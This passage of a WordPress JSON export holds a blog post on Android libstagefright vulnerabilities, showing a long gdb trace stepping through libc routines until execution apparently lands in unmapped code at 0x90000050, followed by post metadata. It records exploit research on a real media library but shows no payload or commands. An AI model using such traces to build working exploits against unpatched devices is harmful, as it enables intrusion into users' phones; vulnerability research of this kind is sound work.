0xb6f0c560<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c564<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c566<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
[New LWP <\/code>24351<\/code>]<\/code><\/div>\n
0xb6f0c576<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c57a<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
[New LWP <\/code>24352<\/code>]<\/code><\/div>\n
0xb6f0c57c<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c57e<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c582<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f2da58<\/code> in<\/code> __mmap2 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f2da5c<\/code> in<\/code> __mmap2 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f2da60<\/code> in<\/code> __mmap2 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f2da64<\/code> in<\/code> __mmap2 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f2da68<\/code> in<\/code> __mmap2 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f2da6c<\/code> in<\/code> __mmap2 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f2da70<\/code> in<\/code> __mmap2 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f2da74<\/code> in<\/code> __mmap2 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c586<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c588<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c58a<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c58c<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c58e<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c590<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c592<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c5bc<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c5be<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c5c6<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0c5c8<\/code> in<\/code> mmap64 () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f03672<\/code> in<\/code> __futex_wake_ex.constprop.<\/code>0<\/code> () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f45338<\/code> in<\/code> pop () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f4835c<\/code> in<\/code> ___Unwind_RaiseException () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f48360<\/code> in<\/code> ___Unwind_RaiseException () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f48364<\/code> in<\/code> ___Unwind_RaiseException () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f03672<\/code> in<\/code> __futex_wake_ex.constprop.<\/code>0<\/code> () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05fd0<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05fd4<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05fd8<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05fdc<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05fe0<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05fe4<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f05fe8<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06028<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0602c<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06030<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06034<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06038<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0603c<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06040<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06044<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06048<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06030<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06034<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06038<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0603c<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06040<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06044<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06048<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06030<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06034<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06038<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0603c<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06040<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06044<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06048<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06030<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06034<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06038<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0603c<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06040<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06044<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06048<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0604c<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06050<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06060<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06064<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06068<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0606c<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06070<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06074<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06078<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06084<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06090<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06094<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f06098<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f0609c<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f060a0<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f060a4<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f060a8<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f060ac<\/code> in<\/code> memcpy () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0xb6f03672<\/code> in<\/code> __futex_wake_ex.constprop.<\/code>0<\/code> () <\/code>from<\/code> \/<\/code>system<\/code>\/<\/code>lib<\/code>\/<\/code>libc.so<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x90000050<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x90000054<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x90000058<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x9000005a<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x9000005c<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x9000005e<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x90000060<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x90000062<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x90000064<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x90000066<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x90000068<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
0x9000006a<\/code> in<\/code> ?? ()<\/code><\/div>\n
(gdb) <\/code><\/div>\n
[LWP <\/code>24145<\/code> exited]<\/code><\/div>\n
<\/div>\n","protected":false},"excerpt":{"rendered":"

There\u2019s been a lot of attention recently around a number of vulnerabilities in Android\u2019s libstagefright. There\u2019s been a lot of confusion about the remote exploitability of the issues, especially on…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[108],"tags":[2894,2895],"class_list":["post-28285","post","type-post","status-publish","format-standard","hentry","category-android-2","tag-cyanogenmod","tag-stagefright"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-7md","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/28285","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=28285"}],"version-history":[{"count":1,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/28285\/revisions"}],"predecessor-version":[{"id":28286,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/28285\/revisions\/28286"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=28285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=28285"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=28285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}